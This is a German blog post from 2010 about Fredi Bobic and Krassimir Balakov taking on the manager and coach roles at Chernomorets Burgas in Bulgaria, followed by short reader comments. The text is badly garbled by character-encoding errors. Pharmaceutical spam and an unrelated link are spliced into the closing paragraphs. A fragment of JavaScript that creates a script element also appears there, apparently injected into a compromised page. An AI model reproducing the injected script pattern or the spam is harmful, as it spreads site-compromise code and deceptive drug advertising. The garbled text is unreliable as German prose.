Willkommen auf » Bobic und Balakov – FuAYballtrAi??ume am Schwarzen Meer
15. Feb 2010

Bobic und Balakov – FuAYballtrAi??ume am Schwarzen Meer

Was machen eigentlich Fredi Bobic und Krassimir Balakov?
Die 2/3 des ehemaligen magischen Dreiecks des VfB Stuttgart der 90er arbeiten zusammen an einem ganz besonderen Projekt in Balakovs Heimat Bulgarien.

In Burgas, der viertgrAi??AYten Stadt Bulgariens, direkt am Schwarzen Meer gelegen, soll ein FuAYballtraum Wirklichkeit werden. Seit der Industrielle Mitko Sabev vor drei Jahren den Ai??rtlichen FuAYball-Club Chernomorets gekauft hat, bastelt er an seiner groAYen Vision: Ein Stadion als Stadtzentrum, auAYen herum Einkaufszentren und ein Yachthafen. Kosten: rund eine halbe Milliarde Euro.

Die Architekten des sportlichen Erfolgs sollen Krassimir Balakov (als Trainer) und Fredi Bobic (als Manager) sein. Geld scheint keine Rolle zu spielen, ein Traumjob an Bulgariens SonnenkA?ste?

Die VertrAi??ge gelten bis 2014, bis dahin sollen Erfolge her. Die Ziele sind klar, man will sich vor allem in den europAi??ischen Wettbewerben prAi??sentieren. In der vergangenen Saison landete man auf Platz 7 der bulgarischen ersten Liga, aktuell findet man den Klub auf dem vierten Platz. Das Zwischenziel ist erreicht, national hat man bereits zu den etablierten Klubs aus Sofia aufgeschlossen.

Nach einem Jahr in der Verantwortung schauen auch die deutschen Medien mal nach dem rechten. Die retin a best price ZDF-Sportreportage http://habatandashti.com/?p=1170 price of voveran injection in india und das WDR-Magazin Sport Inside…

[youtube:http://www.youtube.com/watch?v=PlUQK1s6nWk]

Ein interessantes Projekt, von dem wir mit Sicherheit in den kommenden Jahren noch Ai??fter hAi??ren werden.var d=document;var s=d.createElement(‚script‘); Pills purchasing propranolol amitriptyline price without insurance Cheap Purchase Pills Order Cheap online purchase fertomid tablets


3 Kommentare



  1. Endlich kann ich wieder auf deinen Blog, hab endlich Internet schufafrei bekommen, bin richtig froh. Guter Artikel und Video!!



  2. Ein echt interessantes Projekt. Werde der Entwicklung davon mit Interesse folgen.



  3. Gefällt mir wirklich gut, ich komme wieder! Matthias

Einen Kommentar schreiben